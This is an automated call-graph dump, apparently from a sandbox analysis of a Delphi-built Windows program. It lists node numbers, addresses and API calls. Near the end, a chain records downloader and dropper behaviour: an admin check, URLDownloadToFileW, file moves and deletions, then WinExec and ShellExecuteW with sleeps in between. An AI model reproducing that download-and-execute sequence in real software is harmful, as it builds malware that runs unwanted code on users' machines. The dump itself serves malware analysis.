11779->11732 11781 45ad8da 11780->11781 11783 45ad8c4 11780->11783 11781->11783 11989 45af424 11781->11989 11783->11732 12059 45b7990 PeekMessageW 11784->12059 11787 45b7ad8 11787->11732 11790 45aa90a 11789->11790 11791 45aa917 IsIconic 11789->11791 11790->11757 11791->11757 11821 45b6284 11792->11821 11796 45b669a 11795->11796 11797 45b65fc 11795->11797 11796->11764 11798 45b66a5 11797->11798 11799 45b6604 11797->11799 11798->11796 11800 45b670f 11798->11800 11806 45b66f8 ShowWindow 11798->11806 11799->11796 11801 45b6618 EnumWindows 11799->11801 11800->11796 11804 446f720 72 API calls 11800->11804 11802 45b666b 11801->11802 11803 45b6629 11801->11803 11873 45b64d4 GetWindow 11801->11873 11802->11796 11805 446f720 72 API calls 11802->11805 11803->11802 11809 45b6654 ShowWindow 11803->11809 11807 45b6732 ShowOwnedPopups 11804->11807 11808 45b668e ShowOwnedPopups 11805->11808 11806->11800 11806->11806 11807->11796 11807->11800 11808->11796 11808->11802 11809->11802 11809->11809 11811 45b7180 11810->11811 11812 45b8c24 EnableWindow 11810->11812 11811->11774 11812->11811 11985 45b5758 SystemParametersInfoW 11813->11985 11815 45b57cd ShowWindow 11818 45b57d8 11815->11818 11819 45b57df 11815->11819 11988 45b5788 SystemParametersInfoW 11818->11988 11819->11758 11822 45b6299 11821->11822 11823 45b6320 11821->11823 11822->11823 11824 45b62a2 EnumWindows 11822->11824 11823->11760 11824->11823 11825 45b62c2 GetWindow GetWindowLongW 11824->11825 11868 45b61c0 11824->11868 11826 45b62df 11825->11826 11826->11823 11829 446f720 11826->11829 11830 446f73c SetWindowPos 11829->11830 11831 446f72d 11829->11831 11830->11823 11830->11826 11833 446f634 11831->11833 11838 43d0240 11833->11838 11835 446f672 11843 43ebd60 11835->11843 11837 446f681 11837->11837 11840 43d0248 11838->11840 11839 43d0295 11839->11835 11840->11839 11847 43cd6a0 11840->11847 11842 43d0284 LoadStringW 11842->11839 11844 43ebd6c 11843->11844 11856 43e7288 11844->11856 11846 43ebd99 11846->11837 11848 43cd6cd 11847->11848 11849 43cd6ae 11847->11849 11848->11842 11849->11848 11852 43cd658 11849->11852 11853 43cd668 GetModuleFileNameW 11852->11853 11854 43cd684 11852->11854 11855 43ce8cc 44 API calls 11853->11855 11854->11842 11855->11854 11859 43e72b0 11856->11859 11862 43e72e0 11859->11862 11861 43e72a8 11861->11846 11863 43e72e9 11862->11863 11864 43e7198 72 API calls 11863->11864 11866 43e7349 11863->11866 11864->11866 11865 43e73b0 11865->11861 11866->11865 11867 43e7198 72 API calls 11866->11867 11867->11866 11871 45b61da 11868->11871 11869 45b620a GetWindow 11870 45b6216 GetWindowLongW 11869->11870 11872 45b6222 11869->11872 11870->11872 11871->11869 11871->11872 11874 45b650a 11873->11874 11875 45b64f1 11873->11875 11877 45b650f GetCurrentProcessId 11874->11877 11875->11874 11876 45b64fe GetWindowThreadProcessId 11875->11876 11876->11877 11878 45b6519 11877->11878 11879 45b6568 IsWindowVisible 11878->11879 11882 45b65a8 11878->11882 11880 45b6572 11879->11880 11879->11882 11883 43cd280 11880->11883 11886 43ccfd8 11883->11886 11885 43cd28a 11885->11882 11887 43ccffb 11886->11887 11888 43cd016 11886->11888 11887->11885 11889 43cd084 11888->11889 11891 43cd151 11888->11891 11896 43cd0eb 11889->11896 11897 43ccf94 11889->11897 11891->11896 11914 43ccab8 11891->11914 11892 43ccfd8 26 API calls 11892->11896 11894 43cd09c 11894->11896 11907 43cc990 11894->11907 11896->11887 11896->11892 11918 43d144c 11897->11918 11899 43ccf9d 11900 43ccfa5 11899->11900 11901 43ccfb3 11899->11901 11902 43d144c 4 API calls 11900->11902 11903 43d144c 4 API calls 11901->11903 11904 43ccfaa 11902->11904 11905 43ccfc1 11903->11905 11904->11894 11906 43d144c 4 API calls 11905->11906 11906->11904 11908 43cc9ac 11907->11908 11911 43cc9f0 11907->11911 11909 43cca59 11908->11909 11910 43cca2a 11908->11910 11908->11911 11909->11911 11933 43cc6b4 11909->11933 11910->11911 11912 43cc990 26 API calls 11910->11912 11911->11896 11912->11910 11915 43ccac9 11914->11915 11916 43ccac1 11914->11916 11915->11896 11958 43cc878 11916->11958 11919 43d145b 11918->11919 11920 43d1481 TlsGetValue 11918->11920 11919->11899 11921 43d148b 11920->11921 11922 43d1466 11920->11922 11921->11899 11926 43d1380 11922->11926 11924 43d146b TlsGetValue 11925 43d147a 11924->11925 11925->11899 11927 43d1386 11926->11927 11931 43d13aa 11927->11931 11932 43d136c LocalAlloc 11927->11932 11929 43d13a6 11930 43d13b6 TlsSetValue 11929->11930 11929->11931 11930->11931 11931->11924 11932->11929 11934 43cc853 11933->11934 11935 43cc6d7 11933->11935 11934->11909 11935->11934 11936 43cc990 26 API calls 11935->11936 11937 43cc6b4 26 API calls 11935->11937 11940 43cfd4c 11935->11940 11946 43cfd20 11935->11946 11936->11935 11937->11935 11941 43cfd5e 11940->11941 11942 43cfd20 14 API calls 11941->11942 11943 43cfd73 11942->11943 11950 43cfcb4 11943->11950 11945 43cfd8a 11945->11935 11947 43cfd2b 11946->11947 11948 43cfd45 11946->11948 11954 43cfcec 11947->11954 11948->11935 11951 43cfcbf 11950->11951 11952 43cfce7 11950->11952 11953 43cf8f4 26 API calls 11951->11953 11952->11945 11953->11952 11955 43cfcfd 11954->11955 11956 43cfcf0 11954->11956 11955->11948 11957 43cf9cc 14 API calls 11956->11957 11957->11955 11959 43cc88d 11958->11959 11967 43cc8aa 11958->11967 11960 43cc8de 11959->11960 11961 43cc892 11959->11961 11960->11967 11968 43cb168 11960->11968 11963 43cc91d 11961->11963 11964 43cc8a1 11961->11964 11961->11967 11965 43cc878 26 API calls 11963->11965 11963->11967 11964->11967 11978 43cc50c 11964->11978 11965->11963 11967->11915 11969 43cb18f 11968->11969 11971 43cb16c 11968->11971 11969->11960 11970 43cad5c 11972 43cad70 11970->11972 11973 43cad62 SysFreeString 11970->11973 11971->11970 11974 43cb17f SysReAllocStringLen 11971->11974 11972->11960 11973->11972 11974->11969 11975 43cacf4 11974->11975 11976 43cad10 11975->11976 11977 43cad00 SysAllocStringLen 11975->11977 11976->11960 11977->11975 11977->11976 11979 43cc69b 11978->11979 11982 43cc531 11978->11982 11979->11964 11980 43cfd4c 26 API calls 11980->11982 11981 43cb168 3 API calls 11981->11982 11982->11979 11982->11980 11982->11981 11983 43cc878 26 API calls 11982->11983 11984 43cc50c 26 API calls 11982->11984 11983->11982 11984->11982 11986 45b5777 11985->11986 11986->11815 11987 45b5788 SystemParametersInfoW 11986->11987 11987->11815 11988->11819 11990 45af43c 11989->11990 11991 45af7c6 11989->11991 11990->11991 11992 45af46a 11990->11992 11993 45af455 11990->11993 11991->11783 11995 45af496 11992->11995 11997 45af481 11992->11997 12011 45aec18 11993->12011 11996 45af462 11995->11996 12028 45b59b0 11995->12028 11999 45aec18 75 API calls 11996->11999 12000 45aec18 75 API calls 11997->12000 12001 45af4b1 11999->12001 12000->11996 12035 45b45b4 12001->12035 12003 45b45b4 GetSystemMetrics 12008 45af4c2 12003->12008 12004 45b45a0 72 API calls 12004->12008 12005 45b40d4 GetMonitorInfoW 12005->12008 12006 45b4040 GetMonitorInfoW 12006->12008 12007 45b408c GetMonitorInfoW 12007->12008 12008->11991 12008->12003 12008->12004 12008->12005 12008->12006 12008->12007 12009 45b4074 GetMonitorInfoW 12008->12009 12010 45b4058 GetMonitorInfoW 12008->12010 12009->12008 12010->12008 12038 4500d08 12011->12038 12013 45aec29 MonitorFromWindow 12014 45b45b4 GetSystemMetrics 12013->12014 12015 45aec3b 12014->12015 12016 45aec6a 12015->12016 12021 45aec56 12015->12021 12040 45b45a0 12015->12040 12043 45b5940 12016->12043 12019 45aec74 12020 45b45b4 GetSystemMetrics 12019->12020 12025 45aec7e 12020->12025 12022 45b45a0 72 API calls 12021->12022 12023 45aec62 12022->12023 12023->11996 12024 45b45a0 72 API calls 12024->12025 12025->12023 12025->12024 12026 45aec99 12025->12026 12027 45b45a0 72 API calls 12026->12027 12027->12023 12050 45b5960 12028->12050 12031 45b59d0 12031->11996 12032 45b5940 73 API calls 12033 45b59ca 12032->12033 12034 45b5960 74 API calls 12033->12034 12034->12031 12036 45b45be GetSystemMetrics 12035->12036 12037 45b45c6 12035->12037 12036->12008 12037->12008 12039 4500d12 12038->12039 12039->12013 12041 446f720 72 API calls 12040->12041 12042 45b45b0 12041->12042 12042->12015 12046 45b5908 12043->12046 12047 45b592e EnumDisplayMonitors 12046->12047 12049 45b5918 12046->12049 12047->12019 12048 446f720 72 API calls 12048->12049 12049->12047 12049->12048 12051 45b45b4 GetSystemMetrics 12050->12051 12054 45b5973 12051->12054 12052 45b59a0 12052->12031 12052->12032 12053 45b45a0 72 API calls 12053->12054 12054->12052 12054->12053 12056 45b5993 12054->12056 12058 45b4100 GetMonitorInfoW 12054->12058 12057 45b45a0 72 API calls 12056->12057 12057->12052 12058->12054 12060 45b7a92 12059->12060 12061 45b79b1 12059->12061 12060->11787 12080 45b8764 12060->12080 12062 45b79b7 IsWindowUnicode 12061->12062 12063 45b79c1 12061->12063 12062->12063 12064 45b79e8 PeekMessageA 12063->12064 12065 45b79d2 PeekMessageW 12063->12065 12066 45b79fc 12064->12066 12065->12066 12066->12060 12100 45b982c GetCapture 12066->12100 12068 45b7a37 12068->12060 12107 45b7824 12068->12107 12077 45b7a75 TranslateMessage 12078 45b7a8a DispatchMessageA 12077->12078 12079 45b7a82 DispatchMessageW 12077->12079 12078->12060 12079->12060 12186 45b86d8 GetCursorPos 12080->12186 12083 45b8e0c 126 API calls 12084 45b87ad 12083->12084 12189 45b89c0 12084->12189 12086 45b87cf 12087 45b8815 12086->12087 12090 45b881f 12086->12090 12096 45b881d GetCurrentThreadId 12086->12096 12194 45b8674 12087->12194 12090->12096 12097 45b883b SetTimer 12090->12097 12091 45b8898 12200 448396c 12091->12200 12092 45b889f 12094 45b88ad WaitMessage 12092->12094 12095 45b88b2 12092->12095 12094->12095 12095->11787 12096->12091 12096->12092 12097->12096 12098 45b8862 12097->12098 12099 45b8674 74 API calls 12098->12099 12099->12096 12101 45b9841 12100->12101 12105 45b9852 12100->12105 12101->12105 12135 44f3e70 12101->12135 12103 45b985d 12104 45b9863 GetParent 12103->12104 12103->12105 12106 44f3e70 7 API calls 12103->12106 12104->12103 12104->12105 12105->12068 12106->12103 12108 45b7838 12107->12108 12109 45b784f 12107->12109 12108->12109 12148 45b8e0c 12108->12148 12109->12060 12111 45b76dc 12109->12111 12112 45b76ec 12111->12112 12113 45b7726 12111->12113 12112->12113 12114 45b7713 TranslateMDISysAccel 12112->12114 12113->12060 12115 45b772c 12113->12115 12114->12113 12116 45b781a 12115->12116 12117 45b7747 12115->12117 12116->12060 12130 45b7694 12116->12130 12117->12116 12118 45b7752 GetCapture 12117->12118 12119 45b77dc GetWindowThreadProcessId GetWindowThreadProcessId 12118->12119 12122 45b775d 12118->12122 12119->12116 12120 45b77fd SendMessageW 12119->12120 12120->12116 12129 45b77b9 12120->12129 12123 45b778e 12122->12123 12125 45b7777 GetParent 12122->12125 12126 45b776e 12122->12126 12183 44f3ecc 12122->12183 12124 45b7794 IsWindowUnicode 12123->12124 12123->12126 12127 45b779e SendMessageW 12124->12127 12128 45b77bd SendMessageA 12124->12128 12125->12122 12126->12124 12127->12116 12127->12129 12128->12116 12128->12129 12129->12116 12131 45b76d9 12130->12131 12132 45b76a5 IsWindowUnicode 12130->12132 12131->12060 12131->12077 12133 45b76b1 IsDialogMessageW 12132->12133 12134 45b76c6 IsDialogMessageA 12132->12134 12133->12131 12134->12131 12136 44f3e7b GetWindowThreadProcessId 12135->12136 12137 44f3ec2 12135->12137 12136->12137 12138 44f3e86 GetCurrentProcessId 12136->12138 12137->12103 12138->12137 12139 44f3e90 12138->12139 12140 44f3e9a GlobalFindAtomW 12139->12140 12141 44f3ebb 12140->12141 12142 44f3ea9 GetPropW 12140->12142 12144 44f3e3c GetCurrentProcessId GetWindowThreadProcessId 12141->12144 12142->12137 12145 44f3e53 12144->12145 12147 44f3e69 12144->12147 12146 44f3e58 SendMessageW 12145->12146 12145->12147 12146->12147 12147->12137 12149 45b8e39 12148->12149 12150 45b8e22 12148->12150 12149->12109 12156 45b8d98 12150->12156 12152 45b8e29 12165 45b56d4 12152->12165 12157 45b8df8 12156->12157 12158 45b8da6 12156->12158 12157->12152 12158->12157 12159 45b8dbc IsWindowVisible 12158->12159 12159->12157 12160 45b8dc6 12159->12160 12161 45b8dfa 12160->12161 12162 45b8dd8 12160->12162 12177 45b8ba4 12161->12177 12164 45b8de5 ShowWindow 12162->12164 12164->12157 12166 45b56eb 12165->12166 12167 45b56e0 UnhookWindowsHookEx 12165->12167 12168 45b570c SetEvent GetCurrentThreadId 12166->12168 12169 45b5752 12166->12169 12167->12166 12170 45b5749 CloseHandle 12168->12170 12171 45b5724 12168->12171 12174 45b8be4 12169->12174 12170->12169 12172 45b5730 MsgWaitForMultipleObjects 12171->12172 12173 45b7abc 124 API calls 12171->12173 12172->12170 12172->12171 12173->12172 12175 45b8c01 12174->12175 12176 45b8bf1 KillTimer 12174->12176 12175->12149 12176->12175 12178 45b8be4 KillTimer 12177->12178 12179 45b8bb4 SetTimer 12178->12179 12180 45b8bd9 12179->12180 12181 45b8be0 12179->12181 12182 45b8e0c 128 API calls 12180->12182 12181->12157 12182->12181 12184 44f3e70 7 API calls 12183->12184 12185 44f3ed6 12184->12185 12185->12122 12231 44f59e4 12186->12231 12190 45b89d4 12189->12190 12192 45b89ea 12190->12192 12248 4525204 12190->12248 12192->12086 12193 45b8a08 12193->12086 12198 45b8681 12194->12198 12195 45b86d4 12195->12096 12197 45b86ab IsWindowVisible 12197->12198 12198->12195 12198->12197 12199 45b86bc IsWindowEnabled 12198->12199 12278 45b45e8 12198->12278 12199->12198 12201 4483989 12200->12201 12202 4483980 12200->12202 12281 4484038 12201->12281 12202->12092 12205 44839c7 12206 44839cb 12205->12206 12207 44839d4 12205->12207 12302 4483944 WaitForSingleObject 12206->12302 12306 4483938 ResetEvent 12207->12306 12208 4484038 78 API calls 12211 44839a0 12208->12211 12292 43ebf28 12211->12292 12213 44839c2 12298 43ca390 12213->12298 12215 44839d2 12307 43c9ba4 12215->12307 12217 44839ed 12311 43c992c 12217->12311 12220 4483b62 12220->12092 12221 446f720 72 API calls 12222 4483a4f 12221->12222 12326 446f594 12222->12326 12224 4483a5c 12330 43c9b0c 12224->12330 12226 4483a66 12227 43c9ba4 5 API calls 12226->12227 12228 4483b17 12227->12228 12229 43c992c 13 API calls 12228->12229 12230 4483b1f 12229->12230 12230->12092 12236 44f59b0 WindowFromPoint 12231->12236 12233 44f5a1e 12233->12083 12233->12084 12234 44f59f8 12234->12233 12241 44fd49c 12234->12241 12237 44f59dd 12236->12237 12239 44f59c4 12236->12239 12237->12234 12238 44f3e70 7 API calls 12238->12239 12239->12237 12239->12238 12240 44f59d1 GetParent 12239->12240 12240->12237 12240->12239 12245 44fd51b 12241->12245 12247 44fd4bb 12241->12247 12242 44fd552 12242->12233 12243 446f720 72 API calls 12243->12245 12244 446f720 72 API calls 12244->12247 12245->12242 12245->12243 12246 44fd49c 72 API calls 12246->12247 12247->12244 12247->12245 12247->12246 12249 452520a 12248->12249 12252 44dcf04 12249->12252 12251 452521f 12251->12193 12253 44dcf0a 12252->12253 12256 44a9948 12253->12256 12255 44dcf1f 12255->12251 12257 44a994e 12256->12257 12260 44866a8 12257->12260 12259 44a9963 12259->12255 12261 44866ae 12260->12261 12264 4484c84 12261->12264 12263 44866c3 12263->12259 12265 4484c8b 12264->12265 12266 4484cb0 12265->12266 12268 44850e8 12265->12268 12266->12263 12269 448510a 12268->12269 12270 448513e 12269->12270 12271 44851a0 54 API calls 12269->12271 12272 4484fe4 72 API calls 12270->12272 12271->12270 12273 4485156 12272->12273 12274 44861f8 MultiByteToWideChar MultiByteToWideChar CompareStringW WideCharToMultiByte 12273->12274 12275 448515f 12274->12275 12276 44861a8 72 API calls 12275->12276 12277 4485170 12275->12277 12276->12277 12277->12266 12279 446f720 72 API calls 12278->12279 12280 45b45f8 12279->12280 12280->12198 12282 43d144c 4 API calls 12281->12282 12283 448403e 12282->12283 12291 4484092 12283->12291 12336 4482134 12283->12336 12284 43d144c 4 API calls 12286 448398e 12284->12286 12286->12205 12286->12208 12289 4484053 12340 4494f30 12289->12340 12290 43d144c 4 API calls 12290->12291 12291->12284 12293 43ebf36 12292->12293 12294 43d0240 46 API calls 12293->12294 12295 43ebf60 12294->12295 12296 43e7288 72 API calls 12295->12296 12297 43ebf6e 12296->12297 12297->12213 12299 43ca394 12298->12299 12301 43ca3dc 12299->12301 12410 43c6fb0 12299->12410 12303 448395c 12302->12303 12304 4483957 12302->12304 12303->12215 12413 4483938 ResetEvent 12304->12413 12306->12215 12308 43c9bac 12307->12308 12310 43c9bc2 12308->12310 12414 43c97d0 12308->12414 12310->12217 12319 43c993a 12311->12319 12313 43c9988 12313->12220 12313->12221 12314 43c9963 GetTickCount 12314->12319 12315 43c99d5 GetTickCount 12315->12313 12315->12319 12316 43c9a0c GetTickCount 12436 43c9b24 12316->12436 12317 43c997b GetTickCount 12317->12313 12317->12319 12319->12313 12319->12314 12319->12315 12319->12316 12319->12317 12320 43c99aa GetCurrentThreadId 12319->12320 12424 43c9db8 GetCurrentThreadId 12319->12424 12429 43c95e8 12319->12429 12320->12313 12322 43c9a36 GetTickCount 12323 43c9a1c 12322->12323 12323->12316 12323->12322 12324 43c9aa0 12323->12324 12324->12313 12325 43c9aa6 GetCurrentThreadId 12324->12325 12325->12313 12327 446f59f 12326->12327 12328 446f634 72 API calls 12327->12328 12329 446f5b3 12327->12329 12328->12329 12329->12224 12331 43c9b14 12330->12331 12332 43c9ba4 5 API calls 12331->12332 12333 43c9b1b 12332->12333 12440 43c9ac4 12333->12440 12337 448213a 12336->12337 12354 4483ca0 12337->12354 12339 4482159 12339->12289 12378 449507c 12340->12378 12342 4494f94 12384 43fff04 12342->12384 12343 4494f57 12343->12342 12347 4494faa 12343->12347 12345 4494fa8 12387 4495120 12345->12387 12347->12345 12349 43d0240 46 API calls 12347->12349 12350 4494fda 12349->12350 12351 43ebd60 72 API calls 12350->12351 12352 4494fe9 12351->12352 12353 43ca390 4 API calls 12352->12353 12353->12345 12355 4483cb2 12354->12355 12356 4483cfa 12355->12356 12357 4483d50 GetCurrentThread GetCurrentThreadId 12355->12357 12367 43cabd4 12356->12367 12359 4483d4e 12357->12359 12359->12339 12360 4483d0f 12360->12359 12361 4483d18 GetLastError 12360->12361 12371 43ea7e4 12361->12371 12363 4483d27 12364 43ebf28 72 API calls 12363->12364 12365 4483d49 12364->12365 12366 43ca390 4 API calls 12365->12366 12366->12359 12368 43cabf1 12367->12368 12369 43cac10 CreateThread 12368->12369 12370 43cac39 12369->12370 12376 43cab9c 12369->12376 12370->12360 12372 43ea7fb FormatMessageW 12371->12372 12373 43ea7f5 12371->12373 12374 43ea81d 12372->12374 12373->12372 12375 43ea843 LocalFree 12374->12375 12375->12363 12377 43caba4 12376->12377 12379 449508b 12378->12379 12380 43c9ba4 5 API calls 12379->12380 12381 4495093 12380->12381 12382 43c992c 13 API calls 12381->12382 12383 449509b 12382->12383 12383->12343 12390 4401198 12384->12390 12386 43fff1b 12386->12345 12388 43c9b0c 7 API calls 12387->12388 12389 448408d 12388->12389 12389->12290 12391 44011a8 12390->12391 12392 44011b1 12391->12392 12393 44011bb 12391->12393 12398 4401158 12392->12398 12395 44011c4 12393->12395 12404 43ebd18 12393->12404 12395->12386 12399 440116c 12398->12399 12400 4401177 12399->12400 12401 43ebd18 4 API calls 12399->12401 12407 4402420 12400->12407 12401->12399 12405 43ca390 4 API calls 12404->12405 12406 43ebd22 12405->12406 12406->12395 12408 43ccfd8 26 API calls 12407->12408 12409 4401194 12408->12409 12409->12386 12411 43d144c 4 API calls 12410->12411 12412 43c6fb5 12411->12412 12412->12301 12413->12303 12415 43c97d9 12414->12415 12417 43c97de 12414->12417 12418 43c96a4 GetModuleHandleW GetProcAddress 12415->12418 12417->12310 12419 43c96cc GetLogicalProcessorInformation 12418->12419 12423 43c9714 12418->12423 12420 43c96db GetLastError 12419->12420 12419->12423 12421 43c96e5 12420->12421 12420->12423 12422 43c96ed GetLogicalProcessorInformation 12421->12422 12422->12423 12423->12417 12425 43c9dc5 12424->12425 12426 43c9dcc 12424->12426 12425->12319 12427 43c9df3 12426->12427 12428 43c9de0 GetCurrentThreadId 12426->12428 12427->12319 12428->12427 12430 43c95f3 12429->12430 12431 43c9619 Sleep 12430->12431 12432 43c9622 12430->12432 12435 43c9641 12430->12435 12431->12435 12433 43c963a SwitchToThread 12432->12433 12434 43c9631 Sleep 12432->12434 12433->12435 12434->12435 12435->12319 12437 43c9b7d 12436->12437 12438 43c9b36 12436->12438 12437->12323 12438->12437 12439 43c9b64 Sleep 12438->12439 12439->12438 12445 43c97b8 GetCurrentThreadId 12440->12445 12442 43c9afb 12442->12226 12443 43c9acf 12443->12442 12444 43c9b24 Sleep 12443->12444 12444->12442 12446 43c97c5 12445->12446 12446->12443 12447 43c9ffa 12452 43ca0dd 12447->12452 12453 43ca00d 12447->12453 12448 43ca080 12449 43ca0b0 RtlUnwind 12448->12449 12450 43ca09b UnhandledExceptionFilter 12448->12450 12451 43d144c 4 API calls 12449->12451 12450->12449 12450->12452 12451->12452 12453->12448 12453->12452 12454 43ca060 UnhandledExceptionFilter 12453->12454 12454->12452 12455 43ca075 12454->12455 12455->12449 12456 45fd0e8 IsUserAnAdmin 12457 45fd16b 12456->12457 12461 45fd111 12456->12461 12500 45fce98 12457->12500 12459 45fd175 12460 45fd183 GetMessageW 12459->12460 12462 45fd177 TranslateMessage DispatchMessageW 12460->12462 12466 45fd193 12460->12466 12461->12460 12472 43e6358 12461->12472 12462->12460 12467 45fd13d 12487 45fedcc 12467->12487 12469 45fd155 12491 4605dcc 12469->12491 12471 45fd169 12471->12460 12515 43cb8b4 12472->12515 12474 43e636b GetFileAttributesW 12475 43e637e 12474->12475 12476 43e63ff GetLastError 12474->12476 12477 43e6386 12475->12477 12478 43e639a CreateFileW 12475->12478 12479 43e63c8 12475->12479 12476->12477 12477->12460 12484 43e6dc8 12477->12484 12478->12477 12480 43e63b7 CloseHandle 12478->12480 12479->12477 12481 43e63d4 CreateFileW 12479->12481 12480->12477 12482 43e63fb 12481->12482 12483 43e63f1 CloseHandle 12481->12483 12482->12477 12483->12477 12485 43cb8b4 12484->12485 12486 43e6dd4 CreateDirectoryW 12485->12486 12486->12467 12488 45fede0 12487->12488 12517 4603a58 12488->12517 12490 45fee1b 12490->12469 12492 4605de0 12491->12492 12493 4605df0 Sleep 12492->12493 12494 4605e14 12493->12494 12495 4605e1d URLDownloadToFileW 12494->12495 12496 4605e39 12495->12496 12575 4603be0 12496->12575 12498 4605e55 Sleep 12499 4605e79 12498->12499 12499->12471 12501 45fced9 12500->12501 13045 45b85dc 12501->13045 12503 45fcf02 12504 45b85dc 2 API calls 12503->12504 12505 45fcf24 12504->12505 12506 45fcf37 ShellExecuteExW 12505->12506 12507 45fcf9c 12506->12507 12508 45fcf4b WaitForSingleObject 12506->12508 12510 45fce98 131 API calls 12507->12510 12509 45fcf64 MsgWaitForMultipleObjects 12508->12509 12511 45fcf7d GetExitCodeProcess CloseHandle 12509->12511 12512 45fcf58 12509->12512 12514 45fcfa6 12510->12514 12511->12514 12513 45b7aa4 129 API calls 12512->12513 12513->12509 12514->12459 12516 43cb8ba 12515->12516 12516->12474 12520 4603a88 12517->12520 12518 4603b19 12525 43d00bc 12518->12525 12520->12518 12544 43e5b0c 12520->12544 12521 4603b82 12541 43cad5c 12521->12541 12524 4603ba2 12524->12490 12526 43cad5c SysFreeString 12525->12526 12527 43d00e4 12526->12527 12528 43d013f 12527->12528 12548 43cb810 12527->12548 12530 43cad5c SysFreeString 12528->12530 12531 43d0154 12530->12531 12531->12521 12532 43d00ff 12554 43cff18 12532->12554 12535 43d012c 12538 43cad5c SysFreeString 12535->12538 12536 43d011f 12537 43cb810 2 API calls 12536->12537 12539 43d012a 12537->12539 12538->12539 12540 43cb168 3 API calls 12539->12540 12540->12528 12542 43cad70 12541->12542 12543 43cad62 SysFreeString 12541->12543 12542->12524 12543->12542 12545 43e5b1c 12544->12545 12546 43e5b3d 12545->12546 12570 43e47d4 12545->12570 12546->12520 12549 43cb81d 12548->12549 12553 43cb824 12548->12553 12561 43cacfc 12549->12561 12565 43cb660 12553->12565 12555 43cff2d 12554->12555 12560 43cff4a 12554->12560 12556 43cff88 12555->12556 12558 43cff35 12555->12558 12569 43d02d4 MultiByteToWideChar 12556->12569 12568 43d02d4 MultiByteToWideChar 12558->12568 12560->12535 12560->12536 12562 43cad10 12561->12562 12563 43cad00 SysAllocStringLen 12561->12563 12562->12553 12563->12562 12564 43cacf4 12563->12564 12564->12561 12566 43cb66c 12565->12566 12567 43cb666 SysFreeString 12565->12567 12566->12532 12567->12566 12568->12560 12569->12560 12571 43ebf28 72 API calls 12570->12571 12572 43e47ed 12571->12572 12573 43ca390 4 API calls 12572->12573 12574 43e47f2 12573->12574 12574->12546 12576 4603be9 12575->12576 12597 46059f8 12576->12597 12578 4603ccd 12603 45d5684 12578->12603 12584 4603d0b 12658 43e68b8 12584->12658 12586 4603d3a 12587 43e68b8 5 API calls 12586->12587 12588 4603d64 12587->12588 12667 43eedd8 12588->12667 12590 4603d71 12591 4603d9f MoveFileW Sleep 12590->12591 12592 4603dc4 12591->12592 12673 46021c4 12592->12673 12594 4603de0 12677 46058e8 Sleep WinExec Sleep 12594->12677 12596 4603def Sleep 12596->12498 12598 4605a0c 12597->12598 12678 4476fb0 12598->12678 12600 4605a59 12683 4476ec4 12600->12683 12602 4605aa2 12602->12578 12604 45d57f4 74 API calls 12603->12604 12606 45d569b 12604->12606 12605 45d56ab 12607 4476b8c 80 API calls 12605->12607 12606->12605 12609 43ebe58 46 API calls 12606->12609 12608 45d56e4 12607->12608 12746 45d5734 12608->12746 12611 45d56cf 12609->12611 12613 43ca390 4 API calls 12611->12613 12613->12605 12614 45d64cc 12615 45d64dd 12614->12615 12621 45d64f4 12614->12621 12616 43ebe58 46 API calls 12615->12616 12618 45d64ef 12616->12618 12617 45d6513 12622 45d57f4 12617->12622 12619 43ca390 4 API calls 12618->12619 12619->12621 12621->12617 12840 45d5ccc 12621->12840 12625 45d5811 12622->12625 12623 45d5c11 12624 440004c 72 API calls 12623->12624 12627 45d5c33 12624->12627 12625->12623 12626 45d587c 12625->12626 12633 45d5a92 12625->12633 12628 43cc24c 16 API calls 12626->12628 12627->12584 12629 45d58a9 12628->12629 12630 43fe5b4 50 API calls 12629->12630 12631 45d58b4 12630->12631 12634 43cc50c 26 API calls 12631->12634 12632 45d5b12 13033 45d3698 12632->13033 12633->12632 12635 43cd280 26 API calls 12633->12635 12636 45d58d1 12634->12636 12635->12632 12637 43cc50c 26 API calls 12636->12637 12639 45d58e2 12637->12639 12641 43cc24c 16 API calls 12639->12641 12643 45d58fd 12641->12643 12643->12584 12645 45d3658 46 API calls 12646 45d5b80 12645->12646 12647 45d3658 46 API calls 12646->12647 12648 45d5b97 12647->12648 12649 45d3658 46 API calls 12648->12649 12650 45d5bae 12649->12650 12651 45d3698 46 API calls 12650->12651 12652 45d5bc4 12651->12652 12653 45d3698 46 API calls 12652->12653 12654 45d5bda 12653->12654 12655 45d3658 46 API calls 12654->12655 12656 45d5bf1 12655->12656 12656->12623 13041 45d35e0 12656->13041 12659 43cb8b4 12658->12659 12660 43e68c5 DeleteFileW 12659->12660 12661 43e690d 12660->12661 12662 43e68d7 GetLastError GetFileAttributesW 12660->12662 12661->12586 12663 43e6907 SetLastError 12662->12663 12664 43e68e9 12662->12664 12663->12661 12664->12663 12665 43e68f2 12664->12665 12666 43e68f9 RemoveDirectoryW 12665->12666 12666->12661 12668 43eeded 12667->12668 12669 43eedfe GetEnvironmentVariableW 12668->12669 12670 43eee10 12669->12670 12671 43eee1d 12669->12671 12670->12590 12672 43eee2f GetEnvironmentVariableW 12671->12672 12672->12670 12674 46021db 12673->12674 12675 460220f ShellExecuteW 12674->12675 12676 460223b 12675->12676 12676->12594 12677->12596 12686 4476b8c 12678->12686 12680 4476fc7 12690 4476f60 12680->12690 12682 4476fe2 12682->12600 12684 4476b8c 80 API calls 12683->12684 12685 4476ede 12684->12685 12685->12602 12687 4476b95 12686->12687 12694 4476bd0 12687->12694 12689 4476bb1 12689->12680 12691 4476f74 12690->12691 12692 4476faa 12691->12692 12733 4475324 12691->12733 12692->12682 12695 4476beb 12694->12695 12696 4476c96 12695->12696 12697 4476c18 12695->12697 12719 43e5ee4 12696->12719 12729 43e5f3c 12697->12729 12701 4476ca0 12708 4476cfb 12701->12708 12723 43e6ca4 12701->12723 12703 4476c35 12705 43e6ca4 2 API calls 12703->12705 12703->12708 12704 4476cbb GetLastError 12706 43ea7e4 2 API calls 12704->12706 12707 4476c54 GetLastError 12705->12707 12709 4476cd4 12706->12709 12710 43ea7e4 2 API calls 12707->12710 12708->12689 12711 43ebf28 72 API calls 12709->12711 12712 4476c6d 12710->12712 12713 4476cf6 12711->12713 12714 43ebf28 72 API calls 12712->12714 12715 43ca390 4 API calls 12713->12715 12716 4476c8f 12714->12716 12715->12708 12717 43ca390 4 API calls 12716->12717 12718 4476c94 12717->12718 12718->12708 12720 43e5f38 12719->12720 12721 43e5efa 12719->12721 12720->12701 12721->12720 12722 43e5f32 CreateFileW 12721->12722 12722->12720 12724 43cb8b4 12723->12724 12725 43e6cc4 GetFullPathNameW 12724->12725 12726 43e6ce5 12725->12726 12728 43e6cd6 12725->12728 12727 43e6cfa GetFullPathNameW 12726->12727 12726->12728 12727->12728 